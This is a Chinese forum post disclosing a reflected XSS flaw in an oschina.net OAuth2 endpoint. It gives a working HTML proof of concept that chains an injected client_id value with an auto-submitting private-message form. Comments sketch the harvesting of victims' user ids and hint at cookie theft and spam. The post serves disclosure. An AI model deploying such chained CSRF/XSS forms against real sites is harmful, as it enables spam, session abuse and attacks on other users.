呵呵 闲的无聊发现的。
先说明漏洞纯属理论实现。站务 应该会立即修复。大家就随便看看就好了。
首先汇报 漏洞地址:http://www.oschina.net/action/oauth2/remove_client
参数 client_id 错误值 支持回显到页面上。
但是这个漏洞 有一个user参数 必须是自己的。 然后就有了下面一段
=============================================================
<form id="xssForm" method="post" action ="http://www.oschina.net/action/oauth2/remove_client" target="a" >
<input name="user" value="0"/>
<textarea name="client_id">
<img src="http://static.oschina.net/uploads/user/0/12_200.jpg"/>
<!-- 就可以干别的事了 呵呵 盗取 cookie? 发广告 ? 别干坏事 红薯会不高兴的。-->
</textarea>
<input type="submit" />
</form>
<form id="msg" method="post" action="http://www.oschina.net/action/msg/send?receiver=156344" target="a">
<input name="content" value="text"/>
<input type="submit" />
</form>
<iframe src="" name="a" ></iframe><script>msg.submit()</script>
<script>
//ajax调用自己服务器上的一个接口 去获取最新的留言。
//然后根据留言的用户 获得他的id 具体获得方式 略 一般osc的头像上都有一个 user属性。
//然后填入 xxsForm
//然后 xxsForm.submit()
//然后 嘿嘿 你懂的
</script>
============================================================
除非 你 绕过 http only ;
去年 红薯 被 蟋蟀哥哥 一搞 , document.cookie 不能 得到 cookie 了